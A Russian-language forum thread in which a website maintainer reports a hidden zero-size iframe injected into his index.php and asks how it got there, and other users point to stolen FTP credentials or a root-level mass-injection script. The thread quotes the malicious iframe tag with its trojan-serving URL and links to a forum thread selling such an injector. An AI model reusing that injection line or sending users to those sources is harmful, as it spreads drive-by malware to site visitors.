Я здесь новичок, поэтому прошу сразу не пинать меня. Где-то с месяц назад, на одном из сайтов, кот. я поддерживаю обнаружил в index.php строку Code: <!--iframe width="0" height="0" src="http://eburgertry.info/st/sp/sp.php"></iframe--> акуратно по ссылке троян Поняв что сайт был взломан, я из бекапа восстановил индексный файл. Проблема повторялась подря 3 дня. Не понимал, где дырка (индексу не передавались никакие параметры, был тока вывод данных из mySQL). Потом проблема исчезла, причем никаких изменений я в скрипт не вносил. Сегодня рыскал в инете и случайно наткнулся на сайт: http://www.sadkamney.ru/ где походу та же проблема. Подскажите плиз, знающие люди, где косяк. Каким образом вообще в index.php можно вставить тег. Дайте линки, где об этом почитать можно. Еще раз просьба сильно не пинать зы Да у меня лично register_global=off и разрешения на файлы(в том числе на index.php) стоит 644
При доступе к файлам конечно, ты поди сам уже протроянен, на одном из моих сайтов было так-же когда меня протроянили... Да, и не забудь сменить пароли к сайту, FTP, cpanel, etc...
Спасибо. А как правильно выставить досту к файлам? И вообще где можно прочитать про такого рода взлом сайта. зы да троянец я этот словил на лок. машину, он заменяет IE
вот смотри, что тут продают _http://forum.antichat.ru/thread24250-iframe.html, возможно тебя никто не ломал и не троянил, получили рута на серваке и с помощью скрипта вставили iframe на все сайты хостинга.
Походу это именно оно... Если я правильно понял работу скрипта, мне достаточно, поставить атрибуты на все файлы(в том числе и индекс) 444, то есть read, и проблема решена? Или нет? Доступ на сайт только по ftp естественно по правам рута. Никаких скриптов с записью в индекс и в другие файлы нет. То есть права рута, насколько я понимаю, тока у юзера, который ходит по ftp. Поставив атрибуты на файлы 444 и поменяв пароль на фтп, проблема должна исчезнуть?
